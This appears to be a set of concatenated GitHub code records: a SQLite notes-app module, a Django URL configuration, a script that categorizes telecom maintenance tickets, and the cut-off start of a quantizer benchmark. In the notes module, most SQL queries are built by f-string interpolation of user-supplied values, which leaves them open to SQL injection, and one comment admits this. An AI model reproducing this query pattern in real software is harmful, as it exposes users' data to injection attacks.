= script.fetchall()\n\n script.close()\n db.close()\n return requests\n\n\ndef get_filtered_notes(category: int) -> list:\n db = sql.connect(\"notes.db\")\n script = db.cursor()\n\n sql_query = f\"select * from Notes where note_category = {category}\"\n\n script.execute(sql_query)\n requests = script.fetchall()\n\n script.close()\n db.close()\n return requests\n
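\n\n# The helpers below build SQL with f-strings for brevity; a parameterized\n# equivalent of the insert in add_note (safer against SQL injection) would be:\n# script.execute(\"insert into Notes (note_category, note_title, note_text, creation_date) \"\n# \"values (?, ?, ?, ?)\", (note_category[0], note_title, note_text, creation_date))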
\n\ndef add_note(**kwargs) -> int:\n note_category = kwargs[\"note_category\"]\n note_title = kwargs[\"note_title\"]\n note_text = kwargs[\"note_text\"]\n creation_date = kwargs[\"creation_date\"]\n\n db = sql.connect(\"notes.db\")\n script = db.cursor()\n\n sql_query = \"insert into Notes (note_category, note_title, note_text, creation_date) \" \\\n f\"values ({note_category[0]}, \\\"{note_title}\\\", \\\"{note_text}\\\", \\\"{creation_date}\\\")\"\n script.execute(sql_query)\n note_id = script.lastrowid\n\n db.commit()\n script.close()\n db.close()\n return note_id\n\n\ndef save_note(note_id: int, note_title: str, note_text: str, category_id: int, creation_date: datetime) -> None:\n db = sql.connect(\"notes.db\")\n script = db.cursor()\n\n sql_query = \"update Notes \" \\\n f\"set note_category = {category_id}, note_title = \\\"{note_title}\\\", note_text = \\\"{note_text}\\\",\" \\\n f\" creation_date = \\\"{creation_date}\\\" \" \\\n f\"where note_id = {note_id}\"\n script.execute(sql_query)\n\n db.commit()\n script.close()\n db.close()\n\n\ndef delete_note(note_id: int) -> None:\n db = sql.connect(\"notes.db\")\n script = db.cursor()\n\n sql_query = f\"delete from Notes where note_id = {note_id}\"\n script.execute(sql_query)\n\n db.commit()\n script.close()\n db.close()\n\n\ndef sort_notes(notes_info: list, sort_mode: tuple | None = None):\n # Without a sort mode there is nothing to unpack; keep the original order.\n if sort_mode is None:\n return notes_info\n\n sort_by, sort_type = sort_mode[0].lower(), sort_mode[1]\n sorted_list = notes_info\n\n if sort_by == \"category\":\n category_map = get_categories()\n category_map = {k: v for k, v in category_map}\n sorted_list = sorted(notes_info, key=lambda x: category_map.get(x[1], \"\"))\n elif sort_by == \"note title\":\n sorted_list = sorted(notes_info, key=lambda x: x[2])\n elif sort_by == \"modified date\":\n sorted_list = sorted(notes_info, key=lambda x: x[-1])\n\n if sort_type == \"desc\":\n sorted_list.reverse()\n\n return sorted_list\n\n\ndef get_categories() -> list:\n db = sql.connect(\"notes.db\")\n script = db.cursor()\n\n sql_query = \"select * from Categories\"\n script.execute(sql_query)\n requests = script.fetchall()\n\n script.close()\n db.close()\n return requests\n\n\ndef change_note_category(category_id: int, note_id: int) -> None:\n db = sql.connect(\"notes.db\")\n script = db.cursor()\n\n sql_query = \"update Notes \" \\\n f\"set note_category = {category_id} \" \\\n f\"where note_id = {note_id}\"\n script.execute(sql_query)\n\n db.commit()\n script.close()\n db.close()\n\n\ndef create_category(category_name: str) -> tuple:\n db = sql.connect(\"notes.db\")\n script = db.cursor()\n\n sql_query = f\"insert into Categories (category_name) values (\\\"{category_name}\\\")\"\n script.execute(sql_query)\n category_id = script.lastrowid\n category_info = (category_id, category_name)\n\n db.commit()\n script.close()\n db.close()\n return category_info\n\n\ndef delete_category(category_id: int) -> None:\n db = sql.connect(\"notes.db\")\n script = db.cursor()\n\n sql_query = f\"delete from Categories where category_id = {category_id}\"\n script.execute(sql_query)\n\n db.commit()\n script.close()\n db.close()\n\n\ndef export_to_json(app_version: str, filename: str) -> None:\n db = sql.connect(\"notes.db\")\n script = db.cursor()\n\n notes_list: list[dict] = []\n all_notes: list = get_all_notes()\n for note in all_notes:\n note_dict = {\n \"note_id\": note[0],\n \"note_category\": note[1],\n \"note_title\": note[2],\n \"note_text\": note[3],\n \"creation_date\": note[4],\n }\n notes_list.append(note_dict)\n\n categories_list: list[dict] = []\n all_categories: list = get_categories()\n for category in all_categories:\n category_dict = {\n \"category_id\": category[0],\n \"category_name\": category[1]\n }\n categories_list.append(category_dict)\n\n file_directory = filename + \".json\"\n with open(file_directory, \"w\") as export_file:\n values: dict = {\n \"AppVersion\": app_version,\n \"Notes\": notes_list,\n \"Categories\": categories_list\n }\n json.dump(values, export_file)\n\n script.close()\n db.close()\n
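\n\n# Shape of the file written by export_to_json, for reference (illustrative values):\n# {\"AppVersion\": \"1.0.0\",\n# \"Notes\": [{\"note_id\": 1, \"note_category\": 0, \"note_title\": \"...\", \"note_text\": \"...\", \"creation_date\": \"...\"}],\n# \"Categories\": [{\"category_id\": 0, \"category_name\": \"None\"}]}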
\n\ndef import_from_json(file_name: str, app_version: str) -> bool:\n # Check before connecting: sql.connect() below creates an empty file, which\n # would make a later existence check always succeed.\n if not os.path.exists(\"notes.db\"):\n initialize_database()\n\n db = sql.connect(\"notes.db\")\n script = db.cursor()\n\n with open(file_name, \"r\") as file:\n import_file: dict = json.load(file)\n if import_file.get(\"AppVersion\") != app_version:\n messagebox.showwarning(\"Import failed\", \"The provided json file is not supported in this version. \"\n \"To prevent any issue, importing will not continue :)\")\n return False\n\n current_categories: list = get_categories()\n current_categories: list = [category[1].lower() for category in current_categories]\n imported_categories: list[dict] = import_file[\"Categories\"]\n\n for imported_category in imported_categories:\n category_name = imported_category[\"category_name\"]\n if category_name.lower() not in current_categories:\n create_category(category_name)\n\n imported_notes: list = import_file[\"Notes\"]\n all_categories: list = get_categories()\n\n for imported_note in imported_notes:\n title = imported_note[\"note_title\"]\n text = imported_note[\"note_text\"]\n date = imported_note[\"creation_date\"]\n category_name = \"None\"\n category_id = (0, \"None\")\n\n # This loop takes the category name of the imported note based on the backed up Categories for synchronization\n for imported_category in imported_categories:\n if imported_category[\"category_id\"] == imported_note[\"note_category\"]:\n category_name = imported_category[\"category_name\"]\n\n # This loop takes the category id of the category name from the current categories in the app\n for category in all_categories:\n if category[1].lower() == category_name.lower():\n category_id = category\n\n add_note(note_category=category_id, note_title=title, note_text=text, creation_date=date)\n\n db.commit()\n script.close()\n db.close()\n return True\n\n\nif __name__ == \"__main__\":\n pass\n # notes = get_all_notes()\n # for note in notes:\n # print(f\"Title: {note[2].ljust(20)} | Text: {note[3]}\")\n\n # delete_note(2)\n # print(\"Deleted\")\n # notes = get_all_notes()\n # for note in notes:\n # print(f\"Title: {note[2].ljust(20)} | Text: {note[3]}\")\n\n # categories = get_categories()\n # print(categories)\n\n # export_to_json(\"1.0.0\")\n # import_from_json(\"notes_exported.json\", \"1.0.0\")\n\n print(f\"Unsorted: {get_all_notes()}\")\n print(f'Sorted: {sort_notes(get_all_notes(), (\"modified date\", \"asc\"))}')","repo_name":"rikkadesu/noteplusone","sub_path":"notes_database.py","file_name":"notes_database.py","file_ext":"py","file_size_in_byte":8600,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5555682489","text":"from django.urls import path\nfrom . 
import views\n\nurlpatterns = [\n path(\"home\", views.home, name=\"home\"),\n path(\"request_book/\", views.request_book, name=\"request_book\"),\n path(\n \"request_book/<int:book_id>/\", views.request_book, name=\"request_book_specific\"\n ),\n path(\"request_new_book/\", views.request_new_book, name=\"request_new_book\"),\n path(\"librarian_dashboard/\", views.librarian_dashboard, name=\"librarian_dashboard\"),\n path(\"add_book/\", views.add_book, name=\"add_book\"),\n path(\n \"approve_request/<int:request_id>/\",\n views.approve_request,\n name=\"approve_request\",\n ),\n path(\"assigned_books/\", views.assigned_books, name=\"assigned_books\"),\n path(\n \"revoke_assignment/<int:assignment_id>/\",\n views.revoke_assignment,\n name=\"revoke_assignment\",\n ),\n path(\n \"view_book_details/<int:book_id>/\",\n views.view_book_details,\n name=\"view_book_details\",\n ),\n path(\"logout/\", views.logout_view, name=\"logout\"),\n]\n","repo_name":"ratna1308/Library_management_systems","sub_path":"library/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1022,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34053582839","text":"import pandas as pd \nfrom datetime import time\nfrom openpyxl import load_workbook\nfrom descricao_tra import define_descricao\n\nestados_regioes = {\n 'AC': 'Norte',\n 'AL': 'Nordeste',\n 'AP': 'Norte',\n 'AM': 'Norte',\n 'BA': 'Nordeste',\n 'CE': 'Nordeste',\n 'DF': 'Centro-Oeste',\n 'ES': 'Sudeste',\n 'GO': 'Centro-Oeste',\n 'MA': 'Nordeste',\n 'MT': 'Centro-Oeste',\n 'MS': 'Centro-Oeste',\n 'MG': 'Sudeste',\n 'PA': 'Norte',\n 'PB': 'Nordeste',\n 'PR': 'Sul',\n 'PE': 'Nordeste',\n 'PI': 'Nordeste',\n 'RJ': 'Sudeste',\n 'RN': 'Nordeste',\n 'RS': 'Sul',\n 'RO': 'Norte',\n 'RR': 'Norte',\n 'SC': 'Sul',\n 'SP': 'Sudeste',\n 'SE': 'Nordeste',\n 'TO': 'Norte'\n}\n\nlider = {\n 'DF': 'Gutemberg',\n 'GO': 'Gutemberg',\n 'MT': 'Gutemberg',\n 'MS': 'Gutemberg',\n 'AL': 'Saulo',\n 'BA': 'Douglas',\n 'CE': 'Douglas',\n 'MA': 'Erivaldo',\n 'PB': 'Saulo',\n 'PE': 'Saulo',\n 'PI': 'Luiz Bolzon',\n 'RN': 'Saulo',\n 'SE': 'Saulo',\n 'AC': 'Erivaldo',\n 'AP': 'Erivaldo',\n 'AM': 'Erivaldo',\n 'PA': 'Luiz Bolzon',\n 'RO': 'Erivaldo',\n 'RR': 'Erivaldo',\n 'TO': 'Luiz Bolzon',\n 'ES': 'Dolôr',\n 'MG': 'Dolôr',\n 'RJ': 'Dolôr',\n 'SP': 'Elesandro',\n 'PR': 'Sérgio Mukai',\n 'RS': 'Sérgio Mukai',\n 'SC': 'Sérgio Mukai'\n}\n\ncausa_dicionario = {\n 'Compressor': 'Infraestrutura - Sistema de Climatização',\n 'Ventilador da evaporadora ': 'Infraestrutura - Sistema de Climatização',\n 'Ventilador da evaporadora': 'Infraestrutura - Sistema de Climatização',\n 'FAN-10': 'Infraestrutura - Sistema de Climatização',\n 'Módulo de expansão 2157': 'Infraestrutura - Sistema de Climatização',\n 'Transformador 220 - 24 ': 'Infraestrutura - Sistema de Climatização',\n 'AGST - MP5000 M00 08000004P': 'Infraestrutura - Sistema de Climatização',\n 'Válvula de expansão': 'Infraestrutura - Sistema de Climatização',\n 'Ventilador da condensadora ': 'Infraestrutura - Sistema de Climatização',\n ': ZIEHL - Modelo: ZEIHL ABEGG': 'Infraestrutura - Sistema de Climatização',\n 'PLC SANRIO': 'Infraestrutura - Sistema de Climatização',\n 'Módulo AGST - MP5000 M02 00080800': 'Infraestrutura - Sistema de Climatização',\n 'Placa de circuito interno do Ar-condicionado SANRIO': 'Infraestrutura - Sistema de Climatização',\n 'Tubulação de gás para ar-condicionado.': 'Infraestrutura - Sistema de Climatização',\n 'AGST - MP5000 M00 08000004P': 'Infraestrutura - Sistema de 
Climatização',\n '8 unidade Bateria Sec Power HMA-12 110/12V 110Ah - SEC POWER': 'Infraestrutura - Sistema de Climatização',\n 'Ziehl Abegg 113237 230vts // 60h // 15a/ 40ac': 'Infraestrutura - Sistema de Climatização',\n '4 Ventiladores Ziel ': 'Infraestrutura - Sistema de Climatização',\n 'Controladora PCIR-04': 'Infraestrutura - Sistema de Climatização',\n 'Reposição de gás': 'Infraestrutura - Sistema de Climatização',\n 'Controladora PCIR-04': 'Infraestrutura - Sistema de Climatização',\n 'Falha na tubulação do AC4': 'Infraestrutura - Sistema de Climatização',\n 'Controladora TIC-17 e MF6': 'Infraestrutura - Sistema de Climatização',\n 'Controladora TCIR04': 'Infraestrutura - Sistema de Climatização',\n 'Falha na tubulação do AC1': 'Infraestrutura - Sistema de Climatização',\n 'PLC - TCIR04': 'Infraestrutura - Sistema de Climatização',\n 'SSC10 BBAA': 'Infraestrutura - Sistema de Climatização',\n 'Máquina de ar-condicionado': 'Infraestrutura - Sistema de Climatização',\n 'PLC SANRIO PCIR03G': 'Infraestrutura - Sistema de Climatização',\n 'Tampa da caixa R1': 'Infraestrutura - Sistema Retificador FCC',\n 'Kit Ventilado': 'Infraestrutura - Sistema Retificador FCC',\n 'Placa OMPI': 'Infraestrutura - Sistema Retificador FCC',\n 'RAU2X6U/A26R6AUKL40179/A26': 'Rádio - Equipamento Ericsson',\n 'RAU2x7/A15Ericsson': 'Rádio - Equipamento Ericsson',\n 'NPU 3C': 'Rádio - Equipamento Ericsson',\n 'NPU3 C ROJR 211 006/2 R2A': 'Rádio - Equipamento Ericsson',\n 'DVR/Câmeras/Fonte12V': 'Infraestrutura - Sistema de CFTV',\n 'NVR-2 camera 22': 'Infraestrutura - Sistema de CFTV',\n 'NVR': 'Infraestrutura - Sistema de CFTV',\n 'KoDo PRO - Modelo: KCX-5700N': 'Infraestrutura - Sistema de CFTV',\n ': Isotrafo - Modelo: 45KVA - 13,8 KV': 'Infraestrutura - Sistema de CFTV',\n 'HIK VISION - Modelo: DS-2CD2120F-IS': 'Infraestrutura - Sistema de CFTV',\n 'MCE - Modelo: 300W': 'Infraestrutura - Sistema de CFTV',\n 'Cabos para CFTV': 'Infraestrutura - Sistema de CFTV',\n 'SPVL-4': 'DWDM - Equipamento PADTEC',\n 'SPVL-4SM': 'DWDM - Equipamento PADTEC',\n \"2 Supervisores SMARTPACWEB / SNMP6 UR's 50A FLATPAC21 SPVL-901 Base para DPS3 BANDEJAS para RETIFICADORES FCC ELTEK\": 'DWDM - Equipamento PADTEC',\n 'SPVL-90': 'DWDM - Equipamento PADTEC',\n 'Subbastidor 14uTM400# sobressalente OCM com defeito SPVL-91# com defeito SSC sobressalente': 'DWDM - Equipamento PADTEC',\n 'SPVL 90': 'DWDM - Equipamento PADTEC',\n 'SPVL-91 ': 'DWDM - Equipamento PADTEC',\n 'T100DCT-4JRT2L':'DWDM - Equipamento PADTEC',\n 'T100DCT-4JRT2L\t':'DWDM - Equipamento PADTEC',\n 'TR400C93-QBF-QBF':'DWDM - Equipamento PADTEC',\n 'T100DCT-4PTT2L': 'DWDM - Equipamento PADTEC',\n 'SSC-BBAA - FAN 10':'DWDM - Equipamento PADTEC',\n 'TM400C92QBFXHACA':'DWDM - Equipamento PADTEC',\n 'TM400C92-DBF-XHF-CA.':'DWDM - Equipamento PADTEC',\n 'TM400-9B':'DWDM - Equipamento PADTEC',\n 'T100DCT-4JT2L':'DWDM - Equipamento PADTEC',\n 'TM400C92-DBF-XHF-CA':'DWDM - Equipamento PADTEC',\n 'TR400-9B':'DWDM - Equipamento PADTEC',\n 'LOA4C211AYAHA':'DWDM - Equipamento PADTEC',\n 'SCME-4DP e CVA-4SRA':'DWDM - Equipamento PADTEC',\n '- SPVL-4SM':'DWDM - Equipamento PADTEC',\n 'FAN-G8':'DWDM - Equipamento PADTEC',\n 'SCMD3S1A':'DWDM - Equipamento PADTEC',\n 'T100DCT-4JTMYL':'DWDM - Equipamento PADTEC',\n '- Sobressalente necessário: Placa SSC-AAAA ':'DWDM - Equipamento PADTEC',\n 'CVA-4SRA':'DWDM - Equipamento PADTEC',\n 'Amplificador Óptico de Linha - LOAP14B244AA':'DWDM - Equipamento PADTEC',\n ': SCME-4DP':'DWDM - Equipamento PADTEC',\n 'VOAB-2A16AA':'DWDM - Equipamento 
PADTEC',\n '- Modelo: VOAB-2A16AA':'DWDM - Equipamento PADTEC',\n 'MDSADC21401ST3':'DWDM - Equipamento PADTEC',\n 'BOA4C241BDAHA':'DWDM - Equipamento PADTEC',\n '3x XFP 10G Base-LR/LW 1310nm':'DWDM - Equipamento PADTEC',\n 'LightPad i1600G - Canal de Voz - CVA-4SRA':'DWDM - Equipamento PADTEC',\n 'POA4C141AHAH':'DWDM - Equipamento PADTEC',\n 'PADTEC - LOAP14B244AA#268':'DWDM - Equipamento PADTEC',\n 'TR400-9B#':'DWDM - Equipamento PADTEC',\n 'CVA-4SSA':'DWDM - Equipamento PADTEC',\n 'TCX11-4P-A1#':'DWDM - Equipamento PADTEC',\n 'SFP 10 Gb Modelo: 1200-SM-LL-L': 'IP - Equipamento Datacom',\n 'DM4000 - MPU512 ': 'IP - Equipamento Datacom',\n '1KVA NB HDS LM S2': 'Infraestrutura - Nobreak',\n 'QCAB': 'Infraestrutura - Balizamento de Torre',\n 'Bomba injetora do GMG ': 'Infraestrutura - Grupo Motor Gerador',\n 'Bateria MARCA - DISBAL ; MODELO - S 150MD': 'Infraestrutura - Grupo Motor Gerador',\n 'Bateria de GMG': 'Infraestrutura - Grupo Motor Gerador',\n 'Gerador completo': 'Infraestrutura - Grupo Motor Gerador',\n 'bateria do gerador Optima - Modelo: Gel - Red Top 35 / 12 volts - 44ha - 720a (-18Cº) 910a 0Cº - RC90min': 'Infraestrutura - Grupo Motor Gerador',\n 'DEEP SEA MODELO:DSE-7320': 'Infraestrutura - Grupo Motor Gerador',\n 'Bateria para o GMG': 'Infraestrutura - Grupo Motor Gerador',\n 'USCA - AJX TELECOM - AP Control GMG 7320 8-36 VCC': 'Infraestrutura - Grupo Motor Gerador',\n 'USCA CUNNINS': 'Infraestrutura - Grupo Motor Gerador',\n 'Retificaro GMG': 'Infraestrutura - Grupo Motor Gerador',\n 'Contactora Stemac EK370': 'Infraestrutura - Grupo Motor Gerador',\n 'Bateria ': 'Infraestrutura - Grupo Motor Gerador',\n 'Estemac MWMD229': 'Infraestrutura - Grupo Motor Gerador',\n 'Fonte da Telemetria Siemens': 'Infraestrutura - Sistema de Alarmes',\n 'FTLB in 48V / out 24 V': 'Infraestrutura - Sistema de Alarmes',\n 'OM-SMR100BR-TM-N': 'Infraestrutura - Sistema Retificador FCC',\n ': Emerson - Modelo: R48-3200': 'Infraestrutura - Sistema Retificador FCC',\n 'UR 37A/48Vcc/412 Modelo OM - 1S37': 'Infraestrutura - Sistema Retificador FCC',\n 'EMERSON - Modelo: R48-3200': 'Infraestrutura - Sistema Retificador FCC',\n 'EMERSON R48 - 3200': 'Infraestrutura - Sistema Retificador FCC',\n 'R48-3200': 'Infraestrutura - Sistema Retificador FCC',\n 'Omibra OM1S50N': 'Infraestrutura - Sistema Retificador FCC',\n 'FLATPAC 2 - 3kW': 'Infraestrutura - Sistema Retificador FCC',\n 'OM-SMR100BR-TM-N': 'Infraestrutura - Sistema Retificador FCC',\n 'Novus - RHT Modelo: RHT-WM Transmitter': 'Infraestrutura - Sistema Retificador FCC',\n 'FLATPACK 2 3000W 5A/-48V/4.1.2 - PN 241119.903': 'Infraestrutura - Sistema Retificador FCC',\n 'Aguilera - AE/PX2-F': 'Infraestrutura - Sistema Retificador FCC',\n 'UR 37A/48Vcc': 'Infraestrutura - Sistema Retificador FCC',\n 'FTLB 4824 S': 'Infraestrutura - Sistema Retificador FCC',\n 'Duas unidades SCMD3S1A#': 'Infraestrutura - Sistema Retificador FCC',\n 'Bateria Estacionaria Freedom DF2000 115Ah': 'Infraestrutura - Banco de Baterias',\n 'DELTA - Modelo: GES161B1057000-N': 'Infraestrutura - Banco de Baterias',\n 'SECPower - Modelo: HMA110': 'Infraestrutura - Banco de Baterias',\n 'TecPower - Modelo: HNA 12/110': 'Infraestrutura - Banco de Baterias',\n 'Modelo: pig-tail de alta E2000 / cordão óptico SC/APC E2000/APC': 'Outros',\n 'Cordões com conector E2000': 'Outros',\n 'Cordão óptico': 'Outros',\n 'MCE - Modelo: 300W': 'Outros',\n 'ODU 8giga hertz ': 'Rádio - Equipamento Digitel',\n 'Radio IDU ': 'Rádio - Equipamento Digitel'\n}\n\narquivo = 
\"Lista_modelos_bilhete.xls\"\narquivo2 = \"Base VDS.xlsx\"\nabertura_data = []\nabertura_hora = []\nabertura_mes = []\ntermino_data = []\ntermino_hora = []\ntermino_mes = []\nestacao = []\ndescricao = []\nuf = []\nregiao = []\ntipo_site = []\nlider_regiao = []\ncategoria = []\nsubcategoria = []\nprioridade = []\ncausa = []\n\ndef dividi_data(data_entrada, array_data, array_hora, array_mes):\n if data_entrada == '-':\n array_data.append('-')\n array_hora.append('')\n array_mes.append('-')\n else:\n data_dia, hora = map(str, data_entrada.split(' '))\n h, m ,s = map(int, hora.split(':'))\n array_data.append(data_dia)\n array_hora.append(time(h, m, s))\n array_mes.append(mes_ano(data_dia))\n\ndef mes_ano(data_entrada):\n meses = {\n '01': 'janeiro',\n '02': 'fevereiro',\n '03': 'março',\n '04': 'abril',\n '05': 'maio',\n '06': 'junho',\n '07': 'julho',\n '08': 'agosto',\n '09': 'setembro',\n '10': 'outubro',\n '11': 'novembro',\n '12': 'dezembro'\n }\n mes = data_entrada[3:5]\n ano = data_entrada[8:10]\n return f'{meses.get(mes)}-{ano}'\n\ndef estacao_id(entrada, entrada_2):\n if isinstance(entrada, float):\n estacao.append(entrada_2.lstrip()[0:11])\n descricao.append(define_descricao(entrada_2.lstrip()[0:11]))\n else:\n estacao.append(entrada)\n descricao.append(define_descricao(entrada))\n\ndef estacao_info(estacao_entrada):\n uf.append(estacao_entrada[0:2])\n regiao.append(estados_regioes.get(estacao_entrada[0:2]))\n tipo_site.append(estacao_entrada[6:8])\n lider_regiao.append(lider.get(estacao_entrada[0:2]))\n\ndef define_categoria(entrada, entrada_cat, entrada_sub):\n if isinstance(entrada, float) or entrada == None:\n if(entrada_cat, float) or entrada_cat == None:\n categoria.append('')\n subcategoria.append('')\n else:\n categoria.append(entrada_cat)\n subcategoria.append(entrada_sub)\n elif str(entrada) == 'Cancelado':\n categoria.append('Cancelado')\n subcategoria.append('Cancelado')\n elif str(entrada) == 'Outros' or str(entrada) == 'outros' or str(entrada) == 'Outro' or str(entrada) == 'outro':\n categoria.append('Outros')\n subcategoria.append('Outros')\n elif ' - ' in entrada:\n cat, sub = map(str, entrada.split(' - '))\n categoria.append(cat)\n subcategoria.append(sub)\n else:\n categoria.append('')\n subcategoria.append('')\n\ndef define_prioridade(entrada):\n if isinstance(entrada, float):\n prioridade.append('Baixa')\n else:\n prioridade.append(entrada)\n\ndef define_causa(entrada, entrada2, entrada_base, entrada_nome):\n if '-' in str(entrada):\n causa.append(entrada)\n elif entrada_base == 'Cancelado':\n causa.append('Cancelado')\n else:\n entrada_tratada = str(entrada2).lstrip()\n entrada_tratada = entrada_tratada.upper()\n if 'RETIFICADOR' in entrada_tratada or 'ELTEK' in entrada_tratada or 'EMERSON' in entrada_tratada or 'OMIBRA' in entrada_tratada or '(FONTEOMIBRA)' in entrada_tratada or '(FONTEDELTA)' in entrada_tratada or 'SSC-10' in entrada_tratada or 'ROA4C301AWAHA' in entrada_tratada:\n causa.append('Infraestrutura - Sistema Retificador FCC')\n elif 'TSDA' in entrada_tratada or 'TELEMETRIA' in entrada_tratada or 'SIEMENS' in entrada_tratada:\n causa.append('Infraestrutura - Sistema de Alarmes')\n elif 'INVERSOR' in entrada_tratada:\n causa.append('Infraestrutura - Sistema de Inversores')\n elif 'NOBREAK' in entrada_tratada or 'NDHBSLM72' in entrada_tratada:\n causa.append('Infraestrutura - Nobreak')\n elif 'BATERIAS' in entrada_tratada:\n causa.append('Infraestrutura - Banco de Baterias')\n elif 'RAU' in entrada_tratada or 'RAU2' in entrada_tratada or 'ERICSSON' in 
entrada_tratada:\n causa.append('Rádio - Equipamento Ericsson')\n elif 'DIGITEL' in entrada_tratada or 'DSR – ODU' in entrada_tratada:\n causa.append('Rádio - Equipamento Digitel')\n elif 'MOTOR' in entrada_tratada and ('MWM' in entrada_tratada or 'MWM-D-229-4' in entrada_tratada or 'GERADOR' in entrada_tratada) or entrada_tratada == 'BATERIA' or 'GMG' in entrada_tratada:\n causa.append('Infraestrutura - Grupo Motor Gerador')\n elif 'KIT VENTILADOR' in entrada_tratada or 'KIT DE VENTILADOR' in entrada_tratada or 'COMPRESSOR' in entrada_tratada or 'COMPRESSOR.' in entrada_tratada or 'COMPRESSO' in entrada_tratada or 'FAN' in entrada_tratada:\n causa.append('Infraestrutura - Sistema de Climatização')\n elif 'HD' in entrada_tratada or 'DVR' in entrada_tratada or 'INTELBRAS' in entrada_tratada or 'SEAGATE' in entrada_tratada or 'CÂMERA' in str(entrada2).upper() or 'CAMERA' in str(entrada2).upper():\n causa.append('Infraestrutura - Sistema de CFTV')\n elif 'CISCO' in entrada_tratada:\n causa.append('IP - Equipamento Cisco')\n elif 'DATACOM' in entrada_tratada or 'DM4001' in entrada_tratada:\n causa.append('IP - Equipamento Datacom')\n elif 'HUAWEI' in entrada_tratada or 'AR1220EV' in entrada_tratada or 'AR2200E' in entrada_tratada:\n causa.append('IP - Equipamento Huawei')\n elif 'HP' in entrada_tratada:\n causa.append('IP - Equipamento HP')\n elif 'CPE' in entrada_tratada:\n causa.append('IP - Equipamento CPE')\n elif str(entrada_base) != 'nan':\n causa.append(str(entrada_base))\n else:\n if 'PADTEC' in str(entrada_nome).upper():\n causa.append('DWDM - Equipamento PADTEC')\n elif 'CLIMATIZAÇÃO' in str(entrada_nome).upper() or 'AR-CONDICIONADO' in str(entrada_nome).upper() or 'AR CONDICIONADO' in str(entrada_nome).upper():\n causa.append('Infraestrutura - Sistema de Climatização')\n elif 'CFTV' in str(entrada_nome).upper():\n causa.append('Infraestrutura - Sistema de CFTV')\n elif 'MOTOR' in str(entrada_nome).upper() or 'BATERIA' in str(entrada_nome).upper() or 'GERADOR' in str(entrada_nome).upper():\n causa.append('Infraestrutura - Grupo Motor Gerador')\n elif 'ERICSSON' in str(entrada_nome).upper():\n causa.append('Rádio - Equipamento Ericsson')\n elif 'DIGITEL' in str(entrada_nome).upper():\n causa.append('Rádio - Equipamento Digitel')\n elif 'ALARMES' in str(entrada_nome).upper() or 'SIEMENS' in str(entrada_nome).upper() or 'TELEMETRIA' in str(entrada_nome).upper():\n causa.append('Infraestrutura - Sistema de Alarmes')\n else:\n causa.append(causa_dicionario.get(str(entrada2).lstrip()))\n\narquivo_pd = pd.read_excel(arquivo)\nbase_pd = pd.read_excel(arquivo2)\n\nfor index, row in arquivo_pd.iterrows():\n dividi_data(row['Data abertura'], abertura_data, abertura_hora, abertura_mes)\n dividi_data(row['Término'], termino_data, termino_hora, termino_mes)\n estacao_id(row['Id da Estação'], row['Nome'])\n estacao_info(estacao[index])\n if row['Estado'] == 'Cancelado':\n define_causa(row['Causa do alerta'], row['Sobressalente a ser verificado'], 'Cancelado', row['Nome'])\n define_categoria(causa[index], base_pd['Categoria'][index], base_pd['Subcategoria'][index])\n if isinstance(row['Sobressalente a ser verificado'], float):\n row['Sobressalente a ser verificado'] = 'Cancelado'\n elif index < base_pd.shape[0]:\n define_causa(row['Causa do alerta'], row['Sobressalente a ser verificado'], base_pd['Causa do alerta'][index], row['Nome'])\n define_categoria(causa[index], base_pd['Categoria'][index], base_pd['Subcategoria'][index])\n else:\n define_causa(row['Causa do alerta'], row['Sobressalente a ser 
verificado'], '', row['Nome'])\n define_categoria(causa[index], '', '')\n define_prioridade(row['Nível de prioridade da VDS'])\n \ndf = {\n 'Id ordem serviço': arquivo_pd['Id ordem serviço'],\n 'Nome': arquivo_pd['Nome'],\n 'Estado': arquivo_pd['Estado'],\n 'Data abertura': abertura_data,\n 'Hora Abertura': abertura_hora,\n 'Mês abertura': abertura_mes,\n 'Término': termino_data,\n 'Hora Término': termino_hora,\n 'Mês término': termino_mes,\n 'Data ultima transição': arquivo_pd['Data ultima transição'],\n 'Estação': estacao,\n 'Descrição': descricao,\n 'UF': uf,\n 'Região': regiao,\n 'Tipo Site': tipo_site,\n 'Líder de Campo': lider_regiao,\n 'Sobressalente a ser verificado': arquivo_pd['Sobressalente a ser verificado'],\n 'Nível de prioridade da VDS': prioridade,\n 'Causa do alerta': causa,\n 'Categoria': categoria,\n 'Subcategoria': subcategoria\n}\n\npd_df = pd.DataFrame(df)\n\nprint(base_pd)\n\nwith pd.ExcelWriter('saida.xlsx', engine='xlsxwriter') as writer:\n pd_df.to_excel(writer, sheet_name='BaseVDS', index=False)\n \n workbook = writer.book\n worksheet = writer.sheets['BaseVDS']\n \n header_format = workbook.add_format({\n 'bold': True,\n 'text_wrap': True,\n 'valign': 'top',\n 'fg_color': '#002060',\n 'font_color': '#FFFFFF',\n 'border': 1\n })\n\n worksheet.autofilter(0, 0, 0, len(pd_df.columns) - 1)\n\n center_format = workbook.add_format({'align': 'center'})\n\n #worksheet.set_column(0, len(pd_df.columns) - 1, cell_format=center_format)\n\n for col_num, value in enumerate(pd_df.columns.values):\n worksheet.write(0, col_num, value, header_format)\n\nbook = load_workbook('saida.xlsx')\nsheet = book['BaseVDS']\n\nfor col in sheet.columns:\n max_length = 0\n column = col[0].column_letter\n for cell in col:\n if len(str(cell.value)) > max_length:\n max_length = len(str(cell.value))\n adjusted_width = (max_length + 2)\n sheet.column_dimensions[column].width = adjusted_width\n\nbook.save('saida.xlsx')","repo_name":"danilow200/VDS","sub_path":"atualiza_planilha.py","file_name":"atualiza_planilha.py","file_ext":"py","file_size_in_byte":19923,"program_lang":"python","lang":"pt","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"17289053713","text":"from quantizers import AqQuantizer,PqQuantizer\nfrom methodParams import MethodParams\nfrom dataParams import DataParams\nfrom getRecall import getRecallAt\nfrom newIO import ivecs_read\n\n# parameters\n## Set number of codebook M and codewards for each codebook K\nparamSets = []\nparamSets.append(MethodParams(M=4, K=256))\n\n# datasets\n## Set dataset to be used\ndatasets = []\n# datasets.append(DataParams('siftsmall'))\ndatasets.append(DataParams('sift1M'))\n# datasets.append(DataParams('gist1M'))\n\n# methods\nquantizers = []\n# quantizers.append(AqQuantizer(threadsCount=20, itCount=20))\n# quantizers.append(PqQuantizer(threadsCount=20, itCount=30))\n\ntrainCodebooks = True\nencodeDatasets = False\n\nif trainCodebooks:\n for params in paramSets:\n for data in 